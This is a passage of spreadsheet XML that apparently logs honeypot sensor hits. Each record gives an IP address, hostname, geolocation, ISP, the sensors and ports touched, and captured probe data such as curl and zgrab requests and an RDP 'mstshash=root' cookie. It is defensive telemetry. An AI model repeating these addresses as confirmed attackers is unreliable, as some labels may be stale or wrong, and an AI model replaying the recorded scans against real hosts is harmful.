(,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,60687)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,60763)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:1b76:19f8</t>
  </si>
  <si>
    <t>5c39e9a7dfb295305bca985fa9fdabea</t>
  </si>
  <si>
    <t>220.132.237.245</t>
  </si>
  <si>
    <t>220-132-237-245.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H47&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;63644&amp;&amp;20139&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc84:edf5</t>
  </si>
  <si>
    <t>c68faceb309ee048a4de29e0bd1b96a7</t>
  </si>
  <si>
    <t>114.32.67.177</t>
  </si>
  <si>
    <t>114-32-67-177.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;18681&amp;&amp;80&amp;&amp;23&amp;&amp;NA&amp;&amp;46879</t>
  </si>
  <si>
    <t>::ffff:7220:43b1</t>
  </si>
  <si>
    <t>4a93a70f30ed19037239b0f33d453667</t>
  </si>
  <si>
    <t>77.242.130.19</t>
  </si>
  <si>
    <t>host-77-242-130-19.mywic.eu&amp;&amp;NA</t>
  </si>
  <si>
    <t>44092</t>
  </si>
  <si>
    <t>HAL Service SpA</t>
  </si>
  <si>
    <t>Mywic Costumers</t>
  </si>
  <si>
    <t>::ffff:4df2:8213</t>
  </si>
  <si>
    <t>d12b019db5f39ea5aca25b1df484928c</t>
  </si>
  <si>
    <t>45.164.177.6</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;50833</t>
  </si>
  <si>
    <t>::ffff:2da4:b106</t>
  </si>
  <si>
    <t>e9d51b7808a4c01775b49e2a052fb231</t>
  </si>
  <si>
    <t>125.228.88.11</t>
  </si>
  <si>
    <t>125-228-88-11.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;27268&amp;&amp;80&amp;&amp;23&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:580b</t>
  </si>
  <si>
    <t>5a21e331fd1cdb75ebce1b2242aec519</t>
  </si>
  <si>
    <t>102.212.40.119</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;45173&amp;&amp;45420</t>
  </si>
  <si>
    <t>::ffff:66d4:2877</t>
  </si>
  <si>
    <t>781fd422dbc42c4ac26f97afbdb4bc99</t>
  </si>
  <si>
    <t>42.119.101.47</t>
  </si>
  <si>
    <t>Đắk Lắk</t>
  </si>
  <si>
    <t>Thành Phố Buôn Ma Thuột</t>
  </si>
  <si>
    <t>Buon Ma Thuot</t>
  </si>
  <si>
    <t>1586896</t>
  </si>
  <si>
    <t>12.6675</t>
  </si>
  <si>
    <t>108.038</t>
  </si>
  <si>
    <t>::ffff:2a77:652f</t>
  </si>
  <si>
    <t>828443cd9831914a21d826b3082ee2d2</t>
  </si>
  <si>
    <t>103.157.152.169</t>
  </si>
  <si>
    <t>Mumbai (Satya Nagar)</t>
  </si>
  <si>
    <t>19.101</t>
  </si>
  <si>
    <t>72.888</t>
  </si>
  <si>
    <t>134274</t>
  </si>
  <si>
    <t>Rnet Gigafiber Pvt Ltd</t>
  </si>
  <si>
    <t>::ffff:679d:98a9</t>
  </si>
  <si>
    <t>04498cfbb869948b51815abe3bce77a0</t>
  </si>
  <si>
    <t>62.195.209.34</t>
  </si>
  <si>
    <t>i209034.upc-i.chello.nl&amp;&amp;NA</t>
  </si>
  <si>
    <t>Haarlemermeer</t>
  </si>
  <si>
    <t>Schiphol-Rijk</t>
  </si>
  <si>
    <t>10173838</t>
  </si>
  <si>
    <t>1119</t>
  </si>
  <si>
    <t>52.2773</t>
  </si>
  <si>
    <t>4.74898</t>
  </si>
  <si>
    <t>A2000 / Kabeltelevisie Amsterdam B.V.</t>
  </si>
  <si>
    <t>::ffff:3ec3:d122</t>
  </si>
  <si>
    <t>322e91e58db93281467409b99072d015</t>
  </si>
  <si>
    <t>60.54.234.241</t>
  </si>
  <si>
    <t>Kuala Lumpur (Kampung Attap)</t>
  </si>
  <si>
    <t>50460</t>
  </si>
  <si>
    <t>3.13696</t>
  </si>
  <si>
    <t>101.694</t>
  </si>
  <si>
    <t>4788</t>
  </si>
  <si>
    <t>TM TECHNOLOGY SERVICES SDN BHD</t>
  </si>
  <si>
    <t>Adsl Streamyx</t>
  </si>
  <si>
    <t>TTSSB-MY</t>
  </si>
  <si>
    <t>::ffff:3c36:eaf1</t>
  </si>
  <si>
    <t>f46079786771d7b66d526ab481a27149</t>
  </si>
  <si>
    <t>117.195.246.148</t>
  </si>
  <si>
    <t>::ffff:75c3:f694</t>
  </si>
  <si>
    <t>648472e26a94cf76d1ce451901b59934</t>
  </si>
  <si>
    <t>120.60.217.38</t>
  </si>
  <si>
    <t>Alibag</t>
  </si>
  <si>
    <t>1279027</t>
  </si>
  <si>
    <t>402201</t>
  </si>
  <si>
    <t>18.6539</t>
  </si>
  <si>
    <t>::ffff:783c:d926</t>
  </si>
  <si>
    <t>7af67393b21eea63e6f4bb08c2cf548f</t>
  </si>
  <si>
    <t>120.61.249.156</t>
  </si>
  <si>
    <t>::ffff:783d:f99c</t>
  </si>
  <si>
    <t>15bc1cc4131ed59826426a7520235b73</t>
  </si>
  <si>
    <t>120.61.27.145</t>
  </si>
  <si>
    <t>::ffff:783d:1b91</t>
  </si>
  <si>
    <t>5a56f8ab5dffd84e111189433b474190</t>
  </si>
  <si>
    <t>185.198.181.9</t>
  </si>
  <si>
    <t>AN</t>
  </si>
  <si>
    <t>Andalusia</t>
  </si>
  <si>
    <t>Villarrubia</t>
  </si>
  <si>
    <t>2509488</t>
  </si>
  <si>
    <t>14710</t>
  </si>
  <si>
    <t>37.85</t>
  </si>
  <si>
    <t>-4.9</t>
  </si>
  <si>
    <t>201105</t>
  </si>
  <si>
    <t>WIFI INTERSUR S.L.</t>
  </si>
  <si>
    <t>Wifi Intersur S.L.</t>
  </si>
  <si>
    <t>Intersur Movil S.L</t>
  </si>
  <si>
    <t>2017-04-10</t>
  </si>
  <si>
    <t>::ffff:b9c6:b509</t>
  </si>
  <si>
    <t>2002c7c33947e646d7f91ed8725d6b6c</t>
  </si>
  <si>
    <t>117.219.71.185</t>
  </si>
  <si>
    <t>::ffff:75db:47b9</t>
  </si>
  <si>
    <t>2e77413a76dd689e79265e28986e56f0</t>
  </si>
  <si>
    <t>91.149.6.161</t>
  </si>
  <si>
    <t>161.91-149-6.customer.lyse.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>31438&amp;&amp;23</t>
  </si>
  <si>
    <t>Oslo (Nordre Aker District)</t>
  </si>
  <si>
    <t>59.9488</t>
  </si>
  <si>
    <t>10.7638</t>
  </si>
  <si>
    <t>203995</t>
  </si>
  <si>
    <t>Lyse Tele AS</t>
  </si>
  <si>
    <t>Ice Communication Norge</t>
  </si>
  <si>
    <t>::ffff:5b95:6a1</t>
  </si>
  <si>
    <t>da8e820df05c35bbbdd8ec486b667f1b</t>
  </si>
  <si>
    <t>1.7.151.194</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H43</t>
  </si>
  <si>
    <t>Navi Mumbai (Gavate Wadi)</t>
  </si>
  <si>
    <t>19.17</t>
  </si>
  <si>
    <t>73.0014</t>
  </si>
  <si>
    <t>132215</t>
  </si>
  <si>
    <t>Powergrid Teleservices Limited</t>
  </si>
  <si>
    <t>SIFYNET</t>
  </si>
  <si>
    <t>Sify Limited</t>
  </si>
  <si>
    <t>2011-03-31</t>
  </si>
  <si>
    <t>SIFYNET-IN</t>
  </si>
  <si>
    <t>::ffff:107:97c2</t>
  </si>
  <si>
    <t>a43d23900fcb93b800f42b395a426e24</t>
  </si>
  <si>
    <t>117.242.225.65</t>
  </si>
  <si>
    <t>::ffff:75f2:e141</t>
  </si>
  <si>
    <t>072ac947fa5e07311a646d9cc07eea75</t>
  </si>
  <si>
    <t>120.56.198.54</t>
  </si>
  <si>
    <t>::ffff:7838:c636</t>
  </si>
  <si>
    <t>c465f68b2b2be0fb7d5bed905bd42d42</t>
  </si>
  <si>
    <t>123.21.5.236</t>
  </si>
  <si>
    <t>Quận Bình Thạnh</t>
  </si>
  <si>
    <t>9645087</t>
  </si>
  <si>
    <t>10.8033</t>
  </si>
  <si>
    <t>106.697</t>
  </si>
  <si>
    <t>::ffff:7b15:5ec</t>
  </si>
  <si>
    <t>61aca19aeb08aeb2efe94c64559dbaaf</t>
  </si>
  <si>
    <t>186.236.237.166</t>
  </si>
  <si>
    <t>Barbacena</t>
  </si>
  <si>
    <t>3470858</t>
  </si>
  <si>
    <t>-21.2258</t>
  </si>
  <si>
    <t>-43.7736</t>
  </si>
  <si>
    <t>28219</t>
  </si>
  <si>
    <t>Net Rosas Telecomunicações Ltda.</t>
  </si>
  <si>
    <t>Net Rosas Telecomunicações Ltda</t>
  </si>
  <si>
    <t>::ffff:baec:eda6</t>
  </si>
  <si>
    <t>c0b29b4d2f504f8864d7bb4919c12cb9</t>
  </si>
  <si>
    <t>122.116.116.253</t>
  </si>
  <si>
    <t>122-116-116-253.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H38</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;18734&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a74:74fd</t>
  </si>
  <si>
    <t>46f63d228f3477bb62a8a6b28d091b46</t>
  </si>
  <si>
    <t>59.93.48.51</t>
  </si>
  <si>
    <t>::ffff:3b5d:3033</t>
  </si>
  <si>
    <t>2b899e8e6caa3569897c2895ded1cd09</t>
  </si>
  <si>
    <t>194.187.176.104</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTP_H22</t>
  </si>
  <si>
    <t>8443&amp;&amp;80&amp;&amp;143&amp;&amp;110&amp;&amp;25&amp;&amp;5432&amp;&amp;5900&amp;&amp;443&amp;&amp;3389</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '103.211.202.140:8443', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '38.60.209.6', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '45.14.244.111', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}</t>
  </si>
  <si>
    <t>::ffff:c2bb:b068</t>
  </si>
  <si>
    <t>6ad5dcbe99ccba7f2f5f9b1e863b7ef5</t>
  </si>
  <si>
    <t>117.242.202.145</t>
  </si>
  <si>
    <t>::ffff:75f2:ca91</t>
  </si>
  <si>
    <t>5d5659cdccdc0bd67a1174887f33032d</t>
  </si>
  <si>
    <t>82.17.183.171</t>
  </si>
  <si>
    <t>finc-23-b2-v4wan-160999-cust938.vm7.cable.virginm.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>Cricklewood</t>
  </si>
  <si>
    <t>2651984</t>
  </si>
  <si>
    <t>51.5567</t>
  </si>
  <si>
    <t>-0.21549000000000001</t>
  </si>
  <si>
    <t>::ffff:5211:b7ab</t>
  </si>
  <si>
    <t>99a560e12a9c311895300cafcaea6035</t>
  </si>
  <si>
    <t>117.217.83.239</t>
  </si>
  <si>
    <t>::ffff:75d9:53ef</t>
  </si>
  <si>
    <t>d88615b50bac882ec76555fa313bbaed</t>
  </si>
  <si>
    <t>187.116.112.202</t>
  </si>
  <si>
    <t>PR</t>
  </si>
  <si>
    <t>Paraná</t>
  </si>
  <si>
    <t>Londrina</t>
  </si>
  <si>
    <t>3458449</t>
  </si>
  <si>
    <t>-23.3103</t>
  </si>
  <si>
    <t>-51.1628</t>
  </si>
  <si>
    <t>27699</t>
  </si>
  <si>
    <t>::ffff:bb74:70ca</t>
  </si>
  <si>
    <t>5117f06b1c5511f301ed6141bc11ce8f</t>
  </si>
  <si>
    <t>115.74.232.139</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H34&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;17609&amp;&amp;1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>VIETELxdsl</t>
  </si>
  <si>
    <t>::ffff:734a:e88b</t>
  </si>
  <si>
    <t>acf35d5550e4aeb28bd788c1774c3ea7</t>
  </si>
  <si>
    <t>138.99.179.155</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>LIM</t>
  </si>
  <si>
    <t>Lima region</t>
  </si>
  <si>
    <t>Villa Poeta José Gálvez Barrenechea</t>
  </si>
  <si>
    <t>3937547</t>
  </si>
  <si>
    <t>-12.2131</t>
  </si>
  <si>
    <t>-76.9052</t>
  </si>
  <si>
    <t>269862</t>
  </si>
  <si>
    <t>M &amp; B Soluciones Peru S.A.C. (FASTNET)</t>
  </si>
  <si>
    <t>OPTIC</t>
  </si>
  <si>
    <t>Fibramax Internet</t>
  </si>
  <si>
    <t>::ffff:8a63:b39b</t>
  </si>
  <si>
    <t>aa33d4430e48085665c0a094bf0c889a</t>
  </si>
  <si>
    <t>45.178.248.115</t>
  </si>
  <si>
    <t>NA&amp;&amp;45.178.248.115.universotecnologiainternet.com.br</t>
  </si>
  <si>
    <t>Mateus Leme</t>
  </si>
  <si>
    <t>3457484</t>
  </si>
  <si>
    <t>-19.9864</t>
  </si>
  <si>
    <t>-44.4278</t>
  </si>
  <si>
    <t>269051</t>
  </si>
  <si>
    <t>UNIVERSO FIBER COMUNICACAO MULTIMIDIA</t>
  </si>
  <si>
    <t>Universo Fiber Comunicacao Multimidia</t>
  </si>
  <si>
    <t>::ffff:2db2:f873</t>
  </si>
  <si>
    <t>70d277615c7a3238ad1085a78cbb893e</t>
  </si>
  <si>
    <t>117.219.51.49</t>
  </si>
  <si>
    <t>BSNL GSM NorthZone</t>
  </si>
  <si>
    <t>::ffff:75db:3331</t>
  </si>
  <si>
    <t>e8deb4b63c1d5df3a6b8d55c971cd0f6</t>
  </si>
  <si>
    <t>117.231.141.47</t>
  </si>
  <si>
    <t>::ffff:75e7:8d2f</t>
  </si>
  <si>
    <t>7b4651c6b00bb97441ac5d962806000d</t>
  </si>
  <si>
    <t>117.253.208.109</t>
  </si>
  <si>
    <t>13909&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75fd:d06d</t>
  </si>
  <si>
    <t>522eb0c9d4c3bde6d71d92877a5a8b86</t>
  </si>
  <si>
    <t>117.204.235.41</t>
  </si>
  <si>
    <t>::ffff:75cc:eb29</t>
  </si>
  <si>
    <t>41f88cb33421cdc0a0646f283bb31496</t>
  </si>
  <si>
    <t>223.206.76.121</t>
  </si>
  <si>
    <t>mx-ll-223.206.76-121.dynamic.3bb.co.th&amp;&amp;NA</t>
  </si>
  <si>
    <t>90</t>
  </si>
  <si>
    <t>Songkhla</t>
  </si>
  <si>
    <t>Hat Yai</t>
  </si>
  <si>
    <t>1610780</t>
  </si>
  <si>
    <t>7.00836</t>
  </si>
  <si>
    <t>100.477</t>
  </si>
  <si>
    <t>::ffff:dfce:4c79</t>
  </si>
  <si>
    <t>8be601f4cbf0bafdbaf01dd52637ac07</t>
  </si>
  <si>
    <t>128.106.225.255</t>
  </si>
  <si>
    <t>::ffff:806a:e1ff</t>
  </si>
  <si>
    <t>c8a59d6ccf45d68d3dd7fe83a1a5ccb2</t>
  </si>
  <si>
    <t>117.212.222.153</t>
  </si>
  <si>
    <t>::ffff:75d4:de99</t>
  </si>
  <si>
    <t>22e965f0df9e9958f9b15a494615f790</t>
  </si>
  <si>
    <t>117.214.61.237</t>
  </si>
  <si>
    <t>::ffff:75d6:3ded</t>
  </si>
  <si>
    <t>eb21966a122d918d17379e06d97cdf3c</t>
  </si>
  <si>
    <t>117.195.142.210</t>
  </si>
  <si>
    <t>::ffff:75c3:8ed2</t>
  </si>
  <si>
    <t>c37e7ec76b6dc446dce8d72d9bd6df21</t>
  </si>
  <si>
    <t>37.186.52.7</t>
  </si>
  <si>
    <t>48728</t>
  </si>
  <si>
    <t>vodafoneqatar</t>
  </si>
  <si>
    <t>Vodafone Qatar P.Q.S.C</t>
  </si>
  <si>
    <t>Vodafoneqatar</t>
  </si>
  <si>
    <t>{HTTP_LOGIN:Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Mobile/15E148 Safari/604.1}</t>
  </si>
  <si>
    <t>::ffff:25ba:3407</t>
  </si>
  <si>
    <t>d2b7aaf01c11bbe1ae7df7a0d5e9f3f1</t>
  </si>
  <si>
    <t>61.3.208.152</t>
  </si>
  <si>
    <t>::ffff:3d03:d098</t>
  </si>
  <si>
    <t>673f8ee7557a4e71de4f59d5d25c6bb2</t>
  </si>
  <si>
    <t>147.161.237.101</t>
  </si>
  <si>
    <t>North Lincolnshire</t>
  </si>
  <si>
    <t>Winterton</t>
  </si>
  <si>
    <t>2633786</t>
  </si>
  <si>
    <t>53.655</t>
  </si>
  <si>
    <t>-0.59885</t>
  </si>
  <si>
    <t>::ffff:93a1:ed65</t>
  </si>
  <si>
    <t>075bad72145f2f5db4886dcbde658e20</t>
  </si>
  <si>
    <t>48.216.248.237</t>
  </si>
  <si>
    <t>azpdes1ehs7j.stretchoid.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_POSTGRES_HC1</t>
  </si>
  <si>
    <t>44391&amp;&amp;5432&amp;&amp;NA&amp;&amp;3389&amp;&amp;161&amp;&amp;23&amp;&amp;631&amp;&amp;1521&amp;&amp;5900</t>
  </si>
  <si>
    <t>Rappahannock</t>
  </si>
  <si>
    <t>4792307</t>
  </si>
  <si>
    <t>22747</t>
  </si>
  <si>
    <t>38.7134</t>
  </si>
  <si>
    <t>-78.1591</t>
  </si>
  <si>
    <t>8075</t>
  </si>
  <si>
    <t>Microsoft Corporation</t>
  </si>
  <si>
    <t>Microsoft Limited</t>
  </si>
  <si>
    <t>NA&amp;&amp;connection&amp;&amp;request&amp;&amp;query</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '45.14.244.111:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_VNC:NA}</t>
  </si>
  <si>
    <t>::ffff:30d8:f8ed</t>
  </si>
  <si>
    <t>0e0025f9ded1061beeaaba0efed44e99</t>
  </si>
  <si>
    <t>117.255.69.106</t>
  </si>
  <si>
    <t>::ffff:75ff:456a</t>
  </si>
  <si>
    <t>935e78a13bec196837f6a1dec639698f</t>
  </si>
  <si>
    <t>202.168.87.136</t>
  </si>
  <si>
